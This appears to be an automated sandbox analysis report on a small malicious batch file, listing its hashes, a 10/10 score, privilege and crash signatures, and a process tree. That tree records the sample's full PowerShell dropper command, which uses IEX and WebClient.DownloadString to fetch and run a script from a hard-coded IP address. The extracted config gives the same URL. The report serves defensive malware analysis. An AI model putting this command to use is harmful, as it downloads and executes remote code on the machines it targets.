Analysis
max time kernel: 114s
max time network: 117s
platform: windows10_x64
resource: win10v200217
submitted: 25-03-2020 21:10
Static task: static1
Behavioral task: behavioral1
  Sample: sPECbGga.bat
  Resource: win7v200217 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: sPECbGga.bat
  Resource: win10v200217 (windows10_x64)
  0 signatures, 0 seconds
General
Target: sPECbGga.bat
Size: 194B
MD5: d94d07f2df93865d06f702c261adb86c
SHA1: 9ee4126797bb94f0395cca50216938d0e1c8d02b
SHA256: 9ad514765ac2d6d77c2e2a5d645c162006849ba95b1c3cbb40377c2ec9a229e2
SHA512: 1fa7ec3e2f2492fbdf85992aaee0db311410e627a2f63556facc24cd05efb08977ac14e7d06fee791f9dab9587f3b09b2333e03252fd6ecc1070c627365e4a14
Score: 10/10
Malware Config
Extracted
Language: ps1
Source / URLs: ps1.dropper http://185.103.242.78/pastes/sPECbGga
Signatures
Program crash (1 IoC)
  Processes: WerFault.exe
  pid   pid_target  process       target process
  3516  3992        WerFault.exe  powershell.exe
Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes: WerFault.exe
  description                pid   process
  Token: SeRestorePrivilege  3516  WerFault.exe
  Token: SeBackupPrivilege   3516  WerFault.exe
  Token: SeDebugPrivilege    3516  WerFault.exe
Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes: WerFault.exe
  pid   process
  3516  WerFault.exe  (same entry repeated 14 times)
Processes
1. C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sPECbGga.bat"
   PID: 3896
   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/sPECbGga');Invoke-CCYOAPWUJOK;Start-Sleep -s 10000"
      PID: 3992
      3. C:\Windows\SysWOW64\WerFault.exe
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 704
         Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses
         PID: 3516